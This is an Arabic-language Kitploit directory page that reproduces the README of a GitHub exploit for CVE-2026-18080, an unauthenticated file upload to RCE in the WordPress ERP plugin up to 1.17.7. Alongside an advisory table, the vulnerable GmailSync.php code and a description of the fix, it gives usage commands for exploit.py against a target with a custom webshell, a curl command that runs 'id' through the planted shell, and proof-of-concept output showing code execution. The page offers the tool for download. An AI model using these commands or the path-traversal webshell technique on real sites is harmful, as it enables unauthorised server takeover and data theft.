Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
By-Poloss..-..CVE-2026-18080 — استغلال لثغرة CVE-2026-18080، وهي رفع ملفات تعسفي غير مصادق عليه يؤدي إلى تنفيذ أوامر عن بُعد (RCE) في حزمة ERP Complete HR, Accounting & CRM Suite. يتضمن نصوصًا برمجية بلغة Python وPHP للاستغلال الآلي. | Kitploit
أدوات/GitHubGitHub/polosss/by-poloss..-..cve-2026-18080
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمرتطوير الحمولات
GitHubpolosss/by-poloss..-..cve-2026-18080

By-Poloss..-..CVE-2026-18080

استغلال لثغرة CVE-2026-18080، وهي رفع ملفات تعسفي غير مصادق عليه يؤدي إلى تنفيذ أوامر عن بُعد (RCE) في حزمة ERP Complete HR, Accounting & CRM Suite. يتضمن نصوصًا برمجية بلغة Python وPHP للاستغلال الآلي.

عرض المستودع
منذ 19س 38دلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-18080 — ERP Complete HR, Accounting & CRM Suite <= 1.17.7

رفع ملف تعسفي غير مصادق عبر مرفقات البريد الإلكتروني CRM Email Connect IMAP (Path Traversal → RCE)

الحقلالقيمة
CVEhttps://nvd.nist.gov/vuln/detail/CVE-2026-18080
Wordfencehttps://www.wordfence.com/threat-intel/vulnerabilities/id/b9d11eb9-5e18-459f-a9d4-cccb1d593402
التصحيحhttps://plugins.trac.wordpress.org/changeset/3656848/erp
CVSS9.8 (حرج)
CWECWE-434 (رفع ملف غير مقيد بنوع خطير)
المتأثرإصدارات إضافة ERP <= 1.17.7 (تم الإصلاح في 1.17.8)

الوصف

تعالج دالة save_attachments() في ملف GmailSync.php الخاصة بإضافة ERP المرفقات الواردة عبر البريد الإلكتروني من IMAP دون تطبيع المسار. يمكن للمهاجم صياغة بريد إلكتروني باسم ملف مثل ../../plugins/shell.php مع ترويسة References مزورة تطابق النمط المتوقع للإضافة. تقوم مهمة مزامنة IMAP المجدولة بكتابة الملف خارج دليل crm-attachments/ المحمي بـ .htaccess إلى أي مسار قابل للكتابة تحت wp-content/.

السبب الجذري

في GmailSync.php (الإصدار 1.17.7):

root@kitploit:~
$name = $item['name'];              // لا يوجد basename() أو تطبيع للمسار
$file = wp_check_filetype( $item['name'] );
// ...
$saved = $wp_filesystem->put_contents( $dir . $name, $item['data'] );

اسم الملف ../../plugins/shell.php المتسلسل مع $dir (wp-content/uploads/crm-attachments/) يُحل إلى wp-content/plugins/shell.php — وهو دليل يُسمح فيه بتنفيذ PHP.

يضيف الإصلاح (الإصدار 1.17.8) دالة sanitize_attachment_filename() التي تزيل مكونات المسار عبر basename()، وترفض فواصل المسار، وتمنع الامتدادات الخطيرة.

الاستغلال

الطريقة 1: مباشرة (wp-cli)

root@kitploit:~
python3 exploit.py -t https://wordpress.ddev.site

الطريقة 2: مسار مخصص واسم شيل مخصص

root@kitploit:~
python3 exploit.py -t https://target.com --shell evil.php --path themes

الطريقة 3: فحص phpinfo

root@kitploit:~
python3 exploit.py -t https://target.com --phpinfo

بعد الرفع الناجح:

root@kitploit:~
curl -X POST -d 'cmd=id' 'https://target.com/wp-content/plugins/cve-2026-18080.php'

إثبات المفهوم

root@kitploit:~
RESULT: [{"name":"../../plugins/cve-2026-18080.php","slug":"../../plugins/cve-2026-18080.php","path":".../crm-attachments/../../plugins/cve-2026-18080.php"}]
SUCCESS: wp-content/plugins/cve-2026-18080.php (57 bytes)
RCE: uid=1000(god) gid=1000(god)

الملفات

الملفالوصف
exploit.pyسكربت استغلال بلغة Python يستخدم wp-cli
exploit.phpاستغلال PHP مستقل لـ wp eval-file
README.mdهذا الملف
تنزيل الأداة